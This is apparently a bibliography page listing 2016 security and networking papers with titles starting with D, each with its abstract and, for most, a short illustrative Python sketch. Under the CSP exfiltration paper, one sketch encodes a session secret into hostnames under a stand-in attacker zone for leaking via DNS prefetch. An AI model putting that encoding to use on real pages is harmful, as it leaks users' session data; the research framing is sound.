Biblio

Found 1474 results

Filters: First Letter Of Title is D
2017-09-27
Zhang, Huanle, Du, Wan, Zhou, Pengfei, Li, Mo, Mohapatra, Prasant.  2016.  DopEnc: Acoustic-based Encounter Profiling Using Smartphones. Proceedings of the 22nd Annual International Conference on Mobile Computing and Networking. :294–307.
This paper presents DopEnc, an acoustic-based encounter profiling system on smartphones. DopEnc can automatically identify the persons that users interact with in the context of an encounter. DopEnc performs encounter profiling in two major steps: (1) Doppler profiling to detect that two persons approach and stop in front of each other via an effective trajectory, and (2) voice profiling to confirm that they are thereafter engaged in an interactive conversation. DopEnc is further extended to support parallel acoustic exploration by many users by incorporating a unique multiple-access scheme within the limited inaudible acoustic frequency band. The implementation of DopEnc is based entirely on commodity sensors such as speakers, microphones, and accelerometers integrated in commercial off-the-shelf smartphones. We evaluate DopEnc with detailed experiments and a real use-case study with 11 participants. Overall, DopEnc achieves 6.9% false positive and 9.7% false negative rates in real usage.
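For readers who want a concrete feel for the Doppler-profiling step, the sketch below estimates the Doppler shift of an inaudible pilot tone from a frame of microphone samples and converts it into a relative velocity. This is a minimal illustration, not DopEnc's actual pipeline; the pilot frequency, sampling rate, and search band are assumptions.

```python
import numpy as np

SPEED_OF_SOUND = 343.0   # m/s at room temperature (assumption)
PILOT_HZ = 20000.0       # inaudible pilot tone (assumption)
FS = 48000               # smartphone sampling rate (assumption)

def doppler_velocity(frame, pilot_hz=PILOT_HZ, fs=FS, search_hz=200.0):
    """Estimate relative velocity from the Doppler shift of a pilot tone.

    `frame` is a 1-D numpy array of microphone samples. We locate the
    spectral peak within +/- `search_hz` of the pilot and convert the
    frequency offset into a radial velocity (positive = approaching).
    """
    window = np.hanning(len(frame))
    spectrum = np.abs(np.fft.rfft(frame * window))
    freqs = np.fft.rfftfreq(len(frame), d=1.0 / fs)

    band = (freqs > pilot_hz - search_hz) & (freqs < pilot_hz + search_hz)
    peak_hz = freqs[band][np.argmax(spectrum[band])]

    shift_hz = peak_hz - pilot_hz
    return SPEED_OF_SOUND * shift_hz / pilot_hz

# Synthetic test: a tone received slightly above the pilot frequency.
t = np.arange(8192) / FS
frame = np.cos(2 * np.pi * 20011.6 * t)
print(doppler_velocity(frame))   # positive: the peak sits above the pilot, i.e. approaching
```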
2017-09-26
Padon, Oded, Immerman, Neil, Shoham, Sharon, Karbyshev, Aleksandr, Sagiv, Mooly.  2016.  Decidability of Inferring Inductive Invariants. Proceedings of the 43rd Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. :217–231.

Induction is a successful approach for verification of hardware and software systems. A common practice is to model a system using logical formulas, and then use a decision procedure to verify that some logical formula is an inductive safety invariant for the system. A key ingredient in this approach is coming up with the inductive invariant, which is known as invariant inference. This is a major difficulty, and it is often left for humans or addressed by sound but incomplete abstract interpretation. This paper is motivated by the problem of inductive invariants in shape analysis and in distributed protocols. This paper approaches the general problem of inferring first-order inductive invariants by restricting the language L of candidate invariants. Notice that the problem of invariant inference in a restricted language L differs from the safety problem, since a system may be safe and still not have any inductive invariant in L that proves safety. Clearly, if L is finite (and if testing an inductive invariant is decidable), then inferring invariants in L is decidable. This paper presents some interesting cases when inferring inductive invariants in L is decidable even when L is an infinite language of universal formulas. Decidability is obtained by restricting L and defining a suitable well-quasi-order on the state space. We also present some undecidability results that show that our restrictions are necessary. We further present a framework for systematically constructing infinite languages while keeping the invariant inference problem decidable. We illustrate our approach by showing the decidability of inferring invariants for programs manipulating linked-lists, and for distributed protocols.
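The paper's starting point is that testing whether a given formula is an inductive invariant is decidable; the sketch below shows that check for a toy transition system (a counter incremented by two) using the Z3 SMT solver via its Python bindings. The system and the candidate invariant are illustrative assumptions, not examples from the paper.

```python
from z3 import Int, Solver, Implies, And, Not, unsat

x, x_next = Int("x"), Int("x_next")

init = x == 0                  # initial states
trans = x_next == x + 2        # transition relation: x increases by 2
inv = x >= 0                   # candidate inductive invariant

def valid(formula):
    """A formula is valid iff its negation is unsatisfiable."""
    s = Solver()
    s.add(Not(formula))
    return s.check() == unsat

initiation = valid(Implies(init, inv))                    # Init => Inv
consecution = valid(Implies(And(inv, trans), x_next >= 0))  # Inv /\ Trans => Inv'
print("inductive invariant:", initiation and consecution)
```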

2017-09-19
Bor, Martin C., Roedig, Utz, Voigt, Thiemo, Alonso, Juan M..  2016.  Do LoRa Low-Power Wide-Area Networks Scale? Proceedings of the 19th ACM International Conference on Modeling, Analysis and Simulation of Wireless and Mobile Systems. :59–67.

New Internet of Things (IoT) technologies such as Long Range (LoRa) are emerging that enable power-efficient wireless communication over very long distances. Devices typically communicate directly with a sink node, which removes the need to construct and maintain a complex multi-hop network. However, because a wide area is covered and all devices communicate directly with a few sink nodes, a large number of nodes have to share the communication medium. For this reason, LoRa provides a range of communication options (centre frequency, spreading factor, bandwidth, coding rate) from which a transmitter can choose. Many combinations of these settings are orthogonal and allow simultaneous collision-free communication. Nevertheless, there is a limit to the number of transmitters a LoRa system can support. In this paper we investigate the capacity limits of LoRa networks. Using experiments, we develop models describing LoRa communication behaviour and use these models to parameterise a LoRa simulation to study scalability. Our experiments show that a typical smart-city deployment can support 120 nodes per 3.8 ha, which is not sufficient for future IoT deployments. LoRa networks can scale quite well, however, if they use dynamic communication parameter selection and/or multiple sinks.
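A concrete ingredient of such capacity models is the LoRa time-on-air computation, since the spreading factor and bandwidth determine how long each frame occupies the channel. The sketch below implements the standard Semtech datasheet formula; the parameter defaults are assumptions.

```python
import math

def lora_airtime(payload_bytes, sf=7, bw_hz=125e3, cr=1,
                 preamble_symbols=8, explicit_header=True, crc=True,
                 low_data_rate_opt=False):
    """Time on air (seconds) of one LoRa frame, per the Semtech datasheet formula."""
    t_sym = (2 ** sf) / bw_hz
    t_preamble = (preamble_symbols + 4.25) * t_sym

    ih = 0 if explicit_header else 1
    de = 1 if low_data_rate_opt else 0
    crc_bits = 16 if crc else 0

    num = 8 * payload_bytes - 4 * sf + 28 + crc_bits - 20 * ih
    n_payload = 8 + max(math.ceil(num / (4 * (sf - 2 * de))) * (cr + 4), 0)
    return t_preamble + n_payload * t_sym

# Example: a 20-byte frame at SF12 / 125 kHz occupies the channel over 20x longer
# than at SF7, which is why spreading-factor choice dominates network capacity.
print(lora_airtime(20, sf=7), lora_airtime(20, sf=12))
```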

Municio, Esteban, Latré, Steven.  2016.  Decentralized Broadcast-based Scheduling for Dense Multi-hop TSCH Networks. Proceedings of the Workshop on Mobility in the Evolving Internet Architecture. :19–24.

Wireless Sensor Networks (WSNs) are becoming more and more popular for supporting a wide range of Internet of Things (IoT) applications. Time-Slotted Channel Hopping (TSCH) is a technique for enabling ultra-reliable and ultra-low-power wireless multi-hop networks. TSCH consists of a channel hopping scheme that sends link-layer frames in different time slots and frequencies in order to efficiently combat external interference and multi-path fading. The keystone of TSCH is the scheduling algorithm, which determines for every node at which opportunity (a combination of time slot and channel) it is allowed to send. However, current scheduling algorithms are not suited for dense deployments and have important scalability limitations. In this paper, we investigate TSCH's scheduling performance in dense deployments and show how the scheduling can be improved for such environments. We performed an extensive analysis of the scalability of different scheduling approaches, showing how performance drops as the number of nodes increases. Moreover, we propose a novel Decentralized Broadcast-based Scheduling algorithm called DeBraS, based on selective broadcasting to inform nodes about each other's schedule. Through extensive simulations, we show that DeBraS is far more scalable than centralized solutions and that it outperforms the current decentralized 6TiSCH algorithms by up to 88.5% in terms of throughput for large network sizes.
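To make the scheduling abstraction concrete: a TSCH cell is a (slot offset, channel offset) pair within a slotframe, and a scheduler must avoid handing the same cell to conflicting links. The toy sketch below shows that data structure and the kind of schedule summary a broadcast-based scheme could advertise; it is an illustration, not DeBraS itself.

```python
class TschSchedule:
    """Toy TSCH slotframe: a cell is a (slot_offset, channel_offset) pair."""

    def __init__(self, slots=101, channels=16):
        self.slots = slots
        self.channels = channels
        self.cells = {}  # (slot, channel) -> (sender, receiver)

    def allocate(self, sender, receiver, slot, channel):
        """Reserve a cell for a directed link; fail if the cell is already taken."""
        if (slot, channel) in self.cells:
            return False          # collision with an existing reservation
        self.cells[(slot, channel)] = (sender, receiver)
        return True

    def advertise(self):
        """The kind of schedule summary a broadcast-based scheme could share."""
        return sorted(self.cells.items())

schedule = TschSchedule()
schedule.allocate("node-A", "sink", slot=3, channel=5)
print(schedule.allocate("node-B", "sink", slot=3, channel=5))  # False: cell taken
print(schedule.advertise())
```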

Tromer, Eran, Schuster, Roei.  2016.  DroidDisintegrator: Intra-Application Information Flow Control in Android Apps. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :401–412.

In mobile platforms and their app markets, controlling app permissions and preventing abuse of private information are crucial challenges. Information Flow Control (IFC) is a powerful approach for formalizing and answering user concerns such as: "Does this app send my geolocation to the Internet?" Yet despite intensive research efforts, IFC has not been widely adopted in mainstream programming practice. We observe that the typical structure of Android apps offers an opportunity for a novel and effective application of IFC. In Android, an app consists of a collection of a few dozen "components", each in charge of some high-level functionality. Most components do not require access to most resources. These components are a natural and effective granularity at which to apply IFC (as opposed to the typical process-level or language-level granularity). By assigning different permission labels to each component, and limiting information flow between components, it is possible to express and enforce IFC constraints. Yet nuances of the Android platform, such as its multitude of discretionary (and somewhat arcane) communication channels, raise challenges in defining and enforcing component boundaries. We build a system, DroidDisintegrator, which demonstrates the viability of component-level IFC for expressing and controlling app behavior. DroidDisintegrator uses dynamic analysis to generate IFC policies for Android apps, repackages apps to embed these policies, and enforces the policies at runtime. We evaluate DroidDisintegrator on dozens of apps.
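The core of component-level IFC can be illustrated with a simple label check: each component carries labels for the sensitive resources it may touch, and an inter-component flow is allowed only if the receiver is permitted to hold those labels. The sketch below is a minimal, hypothetical illustration of that subset check, not DroidDisintegrator's actual policy format or enforcement mechanism.

```python
# Each component carries a set of "taint" labels for the resources it may read.
# An inter-component message is allowed only if the receiver is permitted to
# hold every label the sender may have accumulated (a simple subset check).

COMPONENT_LABELS = {
    "LocationTracker": {"geolocation"},
    "UiRenderer": set(),
    "Uploader": {"network"},
}

ALLOWED_TO_RECEIVE = {
    "UiRenderer": {"geolocation"},        # may display location locally
    "Uploader": set(),                    # must never receive location data
    "LocationTracker": {"geolocation"},
}

def flow_allowed(src, dst):
    return COMPONENT_LABELS[src] <= ALLOWED_TO_RECEIVE[dst]

print(flow_allowed("LocationTracker", "UiRenderer"))  # True
print(flow_allowed("LocationTracker", "Uploader"))    # False: blocks exfiltration
```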

Goyal, Shruti, Bindu, P. V., Thilagam, P. Santhi.  2016.  Dynamic Structure for Web Graphs with Extended Functionalities. Proceedings of the International Conference on Advances in Information Communication Technology & Computing. :46:1–46:6.

The hyperlink structure of World Wide Web is modeled as a directed, dynamic, and huge web graph. Web graphs are analyzed for determining page rank, fighting web spam, detecting communities, and so on, by performing tasks such as clustering, classification, and reachability. These tasks involve operations such as graph navigation, checking link existence, and identifying active links, which demand scanning of entire graphs. Frequent scanning of very large graphs involves more I/O operations and memory overheads. To rectify these issues, several data structures have been proposed to represent graphs in a compact manner. Even though the problem of representing graphs has been actively studied in the literature, there has been much less focus on representation of dynamic graphs. In this paper, we propose Tree-Dictionary-Representation (TDR), a compressed graph representation that supports dynamic nature of graphs as well as the various graph operations. Our experimental study shows that this representation works efficiently with limited main memory use and provides fast traversal of edges.
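As a point of reference for the operations the paper targets (edge insertion and removal, link-existence checks, neighbor traversal), the sketch below shows a plain adjacency-set structure; TDR's contribution is to support the same operations over a compressed representation, which this baseline does not attempt.

```python
from collections import defaultdict

class DynamicWebGraph:
    """Adjacency-set baseline for a dynamic directed web graph."""

    def __init__(self):
        self.out = defaultdict(set)   # page -> pages it links to
        self.inc = defaultdict(set)   # page -> pages linking to it

    def add_link(self, src, dst):
        self.out[src].add(dst)
        self.inc[dst].add(src)

    def remove_link(self, src, dst):
        self.out[src].discard(dst)
        self.inc[dst].discard(src)

    def has_link(self, src, dst):
        return dst in self.out[src]       # O(1) link-existence check

    def successors(self, src):
        return iter(self.out[src])        # navigation without a full scan

g = DynamicWebGraph()
g.add_link("a.html", "b.html")
print(g.has_link("a.html", "b.html"), g.has_link("b.html", "a.html"))
```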

Hu, Xuan, Li, Banghuai, Zhang, Yang, Zhou, Changling, Ma, Hao.  2016.  Detecting Compromised Email Accounts from the Perspective of Graph Topology. Proceedings of the 11th International Conference on Future Internet Technologies. :76–82.

While email plays an increasingly important role on the Internet, we are faced with more severe challenges brought by compromised email accounts, especially for the administrators of institutional email service providers. Inspired by previous experience with spam filtering and compromised-account detection, we propose several criteria, such as Success Outdegree Proportion, Reverse PageRank, Recipient Clustering Coefficient, and Legitimate Recipient Proportion, for detecting compromised email accounts from the perspective of graph topology. Specifically, several widely used social network analysis metrics are used and adapted according to the characteristics of mail log analysis. We evaluate our methods on a dataset constructed by mining one month (30 days) of mail logs from a university with 118,617 local users and 11,460,399 mail log entries. The experimental results demonstrate that our methods achieve very positive performance, and we also prove that these methods can be efficiently applied to even larger datasets.
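Two of the listed criteria can be computed directly from a mail-flow graph with networkx, as sketched below: Reverse PageRank (PageRank on the graph with all edges reversed) and a clustering coefficient over an account's contacts. The toy graph is an assumption, and the paper's exact feature definitions and thresholds may differ.

```python
import networkx as nx

# Directed mail-flow graph: an edge u -> v means u sent mail to v.
G = nx.DiGraph()
G.add_edges_from([
    ("alice", "bob"), ("alice", "carol"), ("bob", "carol"),
    ("spammy", "u1"), ("spammy", "u2"), ("spammy", "u3"), ("spammy", "u4"),
])

# Reverse PageRank: PageRank computed on the reversed graph; the paper uses it
# (together with the other criteria) to separate compromised senders from normal ones.
reverse_pr = nx.pagerank(G.reverse(copy=True))

# Recipient clustering coefficient: how densely an account's contacts are
# interconnected (approximated here on the undirected projection).
clustering = nx.clustering(G.to_undirected())

# Compare a normal account with a mass-mailing one.
for account in ("alice", "spammy"):
    print(account, round(reverse_pr[account], 4), round(clustering[account], 4))
```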

Hyun, Yoonjin, Kim, Namgyu.  2016.  Detecting Blog Spam Hashtags Using Topic Modeling. Proceedings of the 18th Annual International Conference on Electronic Commerce: E-Commerce in Smart Connected World. :43:1–43:6.

Tremendous amounts of data are generated daily. Accordingly, unstructured text data that is distributed through news, blogs, and social media has gained much attention from many researchers as this data contains abundant information about various consumers' opinions. However, as the usefulness of text data is increasing, attempts to gain profits by distorting text data maliciously or non-maliciously are also increasing. In this sense, various types of spam detection techniques have been studied to prevent the side effects of spamming. The most representative studies include e-mail spam detection, web spam detection, and opinion spam detection. "Spam" is recognized on the basis of three characteristics and actions: (1) if a certain user is recognized as a spammer, then all content created by that user should be recognized as spam; (2) if certain content is exposed to other users (regardless of the users' intention), then content is recognized as spam; and (3) any content that contains malicious or non-malicious false information is recognized as spam. Many studies have been performed to solve type (1) and type (2) spamming by analyzing various metadata, such as user networks and spam words. In the case of type (3), however, relatively few studies have been conducted because it is difficult to determine the veracity of a certain word or information. In this study, we regard a hashtag that is irrelevant to the content of a blog post as spam and devise a methodology to detect such spam hashtags.

Reaves, Bradley, Blue, Logan, Tian, Dave, Traynor, Patrick, Butler, Kevin R.B..  2016.  Detecting SMS Spam in the Age of Legitimate Bulk Messaging. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :165–170.

Text messaging is used by more people around the world than any other communications technology. As such, it presents a desirable medium for spammers. While this problem has been studied by many researchers over the years, the recent increase in legitimate bulk traffic (e.g., account verification, 2FA, etc.) has dramatically changed the mix of traffic seen in this space, reducing the effectiveness of previous spam classification efforts. This paper demonstrates the performance degradation of those detectors when used on a large-scale corpus of text messages containing both bulk and spam messages. Against our labeled dataset of text messages collected over 14 months, the precision and recall of past classifiers fall to 23.8% and 61.3% respectively. However, using our classification techniques and labeled clusters, precision and recall rise to 100% and 96.8%. We not only show that our collected dataset helps to correct many of the overtraining errors seen in previous studies, but also present insights into a number of current SMS spam campaigns.

Huang, Jianjun, Zhang, Xiangyu, Tan, Lin.  2016.  Detecting Sensitive Data Disclosure via Bi-directional Text Correlation Analysis. Proceedings of the 2016 24th ACM SIGSOFT International Symposium on Foundations of Software Engineering. :169–180.

Traditional sensitive data disclosure analysis faces two challenges: to identify sensitive data that is not generated by specific API calls, and to report the potential disclosures when the disclosed data is recognized as sensitive only after the sink operations. We address these issues by developing BidText, a novel static technique to detect sensitive data disclosures. BidText formulates the problem as a type system, in which variables are typed with the text labels that they encounter (e.g., during key-value pair operations). The type system features a novel bi-directional propagation technique that propagates the variable label sets through forward and backward data-flow. A data disclosure is reported if a parameter at a sink point is typed with a sensitive text label. BidText is evaluated on 10,000 Android apps. It reports 4,406 apps that have sensitive data disclosures, with 4,263 apps having log based disclosures and 1,688 having disclosures due to other sinks such as HTTP requests. Existing techniques can only report 64.0% of what BidText reports. And manual inspection shows that the false positive rate for BidText is 10%.
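The flavor of bi-directional propagation can be shown on a toy def-use graph: text labels seeded at certain program points are spread along data-flow edges in both directions until a fixpoint, and a disclosure is flagged when a sink variable ends up labeled. The sketch below is a crude illustration of that idea, not BidText's type system.

```python
# Toy data-flow edges: (src, dst) means the value of src flows into dst.
FLOWS = [("ui_label", "key"), ("key", "pair"), ("value", "pair"),
         ("pair", "request_body")]

# Text labels observed at particular program points (e.g. key-value operations).
SEEDS = {"ui_label": {"password"}}
SINKS = {"request_body"}

def propagate(flows, seeds):
    labels = {var: set(s) for var, s in seeds.items()}
    changed = True
    while changed:                                  # iterate to a fixpoint
        changed = False
        for src, dst in flows:
            for a, b in ((src, dst), (dst, src)):   # forward and backward
                new = labels.get(a, set()) - labels.get(b, set())
                if new:
                    labels.setdefault(b, set()).update(new)
                    changed = True
    return labels

labels = propagate(FLOWS, SEEDS)
for sink in SINKS:
    if labels.get(sink):
        print(f"potential disclosure at {sink}: {labels[sink]}")
```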

2017-09-15
Nicholas, Charles, Brandon, Robert.  2016.  Document Engineering Issues in Malware Analysis. Proceedings of the 2016 ACM Symposium on Document Engineering. :3–3.

We present an overview of the field of malware analysis with emphasis on issues related to document engineering. We will introduce the field with a discussion of the types of malware, including executable binaries, malicious PDFs, polymorphic malware, ransomware, and exploit kits. We will conclude with our view of important research questions in the field. This is an updated version of last year's tutorial, with more information about web-based malware and malware targeting the Android market.

Nalla, Venu, Sahu, Rajeev Anand, Saraswat, Vishal.  2016.  Differential Fault Attack on SIMECK. Proceedings of the Third Workshop on Cryptography and Security in Computing Systems. :45–48.

In 2013, researchers from the National Security Agency of the USA (NSA) proposed two lightweight block ciphers, SIMON and SPECK [3]. While SIMON is tuned for optimal performance in hardware, SPECK is tuned for optimal performance in software. At CHES 2015, Yang et al. [6] combined the "good" design components from both SIMON and SPECK and proposed a new lightweight block cipher, SIMECK, that is even more compact and efficient. In this paper we show that SIMECK is vulnerable to fault attacks and demonstrate two such attacks. The first is a random bit-flip fault attack that recovers the n-bit last round key of SIMECK using on average about n/2 faults; the second is a more practical random byte fault attack that recovers the n-bit last round key using on average about n/6.5 faults.

Schulz, Matthias, Loch, Adrian, Hollick, Matthias.  2016.  DEMO: Demonstrating Practical Known-Plaintext Attacks Against Physical Layer Security in Wireless MIMO Systems. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :201–203.

After being widely studied in theory, physical layer security schemes are getting closer to enter the consumer market. Still, a thorough practical analysis of their resilience against attacks is missing. In this work, we use software-defined radios to implement such a physical layer security scheme, namely, orthogonal blinding. To this end, we use orthogonal frequency-division multiplexing (OFDM) as a physical layer, similarly to WiFi. In orthogonal blinding, a multi-antenna transmitter overlays the data it transmits with noise in such a way that every node except the intended receiver is disturbed by the noise. Still, our known-plaintext attack can extract the data signal at an eavesdropper by means of an adaptive filter trained using a few known data symbols. Our demonstrator illustrates the iterative training process at the symbol level, thus showing the practicability of the attack.
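The heart of the attack is an adaptive filter trained on known symbols. The sketch below shows the idea on synthetic baseband data: a two-antenna eavesdropper observes different mixtures of the data and the blinding noise, and an LMS filter trained on a short known-plaintext prefix learns a spatial combination that cancels the noise. The channel gains and signal model are assumptions, not measurements from the demonstrator.

```python
import numpy as np

rng = np.random.default_rng(1)
n, known = 5000, 200
data = rng.choice([-1.0, 1.0], size=n)          # BPSK data symbols
blinding = rng.normal(0, 1.0, size=n)           # artificial noise from the transmitter

# Two-antenna eavesdropper: each antenna sees a different mix of data and noise.
h = np.array([0.9, 0.4])                        # channel gains for the data
g = np.array([0.5, -0.8])                       # channel gains for the blinding noise
rx = np.outer(data, h) + np.outer(blinding, g)  # received samples, shape (n, 2)

# LMS adaptation on the first `known` symbols (the known plaintext).
w, mu = np.zeros(2), 0.05
for i in range(known):
    err = data[i] - w @ rx[i]
    w += 2 * mu * err * rx[i]

# The trained spatial filter suppresses the blinding noise for the rest of the stream.
decisions = np.sign(rx[known:] @ w)
print("symbol error rate:", np.mean(decisions != data[known:]))
```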

Ghassemi, Mohsen, Sarwate, Anand D., Wright, Rebecca N..  2016.  Differentially Private Online Active Learning with Applications to Anomaly Detection. Proceedings of the 2016 ACM Workshop on Artificial Intelligence and Security. :117–128.

In settings where data instances are generated sequentially or in streaming fashion, online learning algorithms can learn predictors using incremental training algorithms such as stochastic gradient descent. In some security applications such as training anomaly detectors, the data streams may consist of private information or transactions and the output of the learning algorithms may reveal information about the training data. Differential privacy is a framework for quantifying the privacy risk in such settings. This paper proposes two differentially private strategies to mitigate privacy risk when training a classifier for anomaly detection in an online setting. The first is to use a randomized active learning heuristic to screen out uninformative data points in the stream. The second is to use mini-batching to improve classifier performance. Experimental results show how these two strategies can trade off privacy, label complexity, and generalization performance.
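As background on where the privacy noise enters in such schemes, the sketch below shows a generic differentially private online update for logistic regression: the per-example gradient is clipped and perturbed before the model is updated. The noise calibration here is deliberately rough, and the whole example illustrates the mechanism rather than the paper's algorithms.

```python
import numpy as np

rng = np.random.default_rng(0)

def dp_sgd_step(w, x, y, lr=0.1, clip=1.0, epsilon=0.5):
    """One noisy online update for logistic regression (y in {-1, +1}).

    The per-example gradient is clipped to L2 norm `clip`, then Laplace noise
    (calibrated loosely, for illustration, to the clip bound and a per-step
    epsilon) is added before the gradient step.
    """
    margin = y * (w @ x)
    grad = -y * x / (1.0 + np.exp(margin))          # logistic loss gradient
    norm = np.linalg.norm(grad)
    if norm > clip:
        grad = grad * (clip / norm)                  # bound the sensitivity
    noise = rng.laplace(scale=2.0 * clip / epsilon, size=w.shape)
    return w - lr * (grad + noise)

# Stream of labelled points; in an anomaly-detection setting the rare class
# would be the anomalies.
w = np.zeros(3)
for _ in range(1000):
    x = rng.normal(size=3)
    y = 1.0 if x[0] + 0.5 * x[1] > 0 else -1.0
    w = dp_sgd_step(w, x, y)
print("learned weights (noisy):", np.round(w, 2))
```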

Sillaber, Christian, Sauerwein, Clemens, Mussmann, Andrea, Breu, Ruth.  2016.  Data Quality Challenges and Future Research Directions in Threat Intelligence Sharing Practice. Proceedings of the 2016 ACM on Workshop on Information Sharing and Collaborative Security. :65–70.

In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents and mitigation strategies results from the organizations' growing need to protect against today's sophisticated cyber attacks. To investigate data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing and storing data. As expected, the study finds that the main factors that affect shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants. Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues – particularly related to scalability and data source integration – deserve particular attention.

2017-09-11
Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As consequences of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.
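To make the DNS-prefetching channel concrete, the sketch below shows only the attacker-side encoding step: a secret is packed into DNS-safe labels under an attacker-controlled zone (the domain name is hypothetical), so that merely resolving those names leaks the data even if CSP blocks fetching from the zone.

```python
import base64

ATTACKER_ZONE = "exfil.example"          # hypothetical attacker-controlled zone
MAX_LABEL = 63                           # DNS label length limit

def exfil_hostnames(secret: bytes, zone: str = ATTACKER_ZONE):
    """Encode a secret into DNS-safe labels; resolving these names leaks the data."""
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    return [f"{chunk}.{i}.{zone}" for i, chunk in enumerate(chunks)]

# A page could emit <link rel="dns-prefetch" href="//NAME"> for each name; the
# paper shows that such DNS lookups can still happen under a restrictive CSP.
for name in exfil_hostnames(b"session=deadbeef"):
    print(name)
```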

Baumann, Peter, Katzenbeisser, Stefan, Stopczynski, Martin, Tews, Erik.  2016.  Disguised Chromium Browser: Robust Browser, Flash and Canvas Fingerprinting Protection. Proceedings of the 2016 ACM on Workshop on Privacy in the Electronic Society. :37–46.

Browser fingerprinting is a widely used technique to uniquely identify web users and to track their online behavior. Until now, different tools have been proposed to protect the user against browser fingerprinting. However, these tools have usability restrictions as they deactivate browser features and plug-ins (like Flash) or the HTML5 canvas element. In addition, all of them only provide limited protection, as they randomize browser settings with unrealistic parameters or have methodical flaws, making them detectable for trackers. In this work we demonstrate the first anti-fingerprinting strategy, which protects against Flash fingerprinting without deactivating it, provides robust and undetectable anti-canvas fingerprinting, and uses a large set of real-world data to hide the actual system and browser properties without losing usability. We discuss the methods and weaknesses of existing anti-fingerprinting tools in detail and compare them to our enhanced strategies. Our evaluation against real-world fingerprinting tools shows successful fingerprinting protection in over 99% of 70,000 browser sessions.

2017-09-05
Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
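A minimal illustration of embedding into a carrier stream of sensor data is least-significant-bit substitution, sketched below on synthetic 16-bit accelerometer samples. The paper's scheme is more sophisticated, but the sketch shows why the distortion can be negligible: each carrier sample changes by at most one unit.

```python
import numpy as np

def embed(carrier: np.ndarray, payload: bytes) -> np.ndarray:
    """Hide payload bits in the least significant bit of each carrier sample."""
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
    if len(bits) > len(carrier):
        raise ValueError("carrier stream too short for payload")
    stego = carrier.copy()
    stego[:len(bits)] = (stego[:len(bits)] & ~1) | bits
    return stego

def extract(stego: np.ndarray, n_bytes: int) -> bytes:
    bits = (stego[:n_bytes * 8] & 1).astype(np.uint8)
    return np.packbits(bits).tobytes()

# Carrier: raw 16-bit accelerometer readings (synthetic here); in the paper's
# setting the payload would already be ciphertext.
carrier = np.random.default_rng(0).integers(-2000, 2000, size=4096, dtype=np.int16)
stego = embed(carrier, b"encrypted-note")
print(extract(stego, len(b"encrypted-note")))
```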

Basan, Alexander, Basan, Elena, Makarevich, Oleg.  2016.  Development of the Hierarchal Trust Management System for Mobile Cluster-based Wireless Sensor Network. Proceedings of the 9th International Conference on Security of Information and Networks. :116–122.

In this paper a model of a secure wireless sensor network (WSN) was developed. This model is able to defend against most known network attacks without significantly reducing the energy resources of sensor nodes (SN). We propose clustering as a way of network organization, which allows reducing energy consumption. Network protection is based on the calculation of trust levels and the establishment of trusted relationships between trusted nodes. The primary purpose of the hierarchical trust management system (HTMS) is to protect the WSN from malicious actions of an attacker. The developed system should combine the properties of energy efficiency and reliability. To achieve this goal the following tasks are performed: detection of illegal actions of an intruder; blocking of malicious nodes; avoidance of malicious attacks; determining the authenticity of nodes; establishment of trusted connections between authentic nodes; and detection and blocking of defective nodes. The HTMS operation is based on the use of Bayes' theorem and the calculation of direct and centralized trust values.
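The abstract does not spell out the trust computation beyond its use of Bayes' theorem; a common Bayesian instantiation, used here purely as an assumed illustration (not necessarily the authors' formula), is a beta-reputation estimate updated from counts of well-behaved and suspicious interactions.

```python
class NodeTrust:
    """Beta-reputation style trust estimate for one sensor node."""

    def __init__(self):
        self.good = 0   # observed well-behaved interactions
        self.bad = 0    # observed suspicious interactions (drops, bad routes, ...)

    def update(self, well_behaved: bool):
        if well_behaved:
            self.good += 1
        else:
            self.bad += 1

    @property
    def trust(self) -> float:
        # Posterior mean of a Beta(good + 1, bad + 1) distribution.
        return (self.good + 1) / (self.good + self.bad + 2)

node = NodeTrust()
for outcome in [True, True, True, False, True]:
    node.update(outcome)
print(round(node.trust, 3))          # 0.714
TRUST_THRESHOLD = 0.5                # below this, a cluster head might block the node
```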

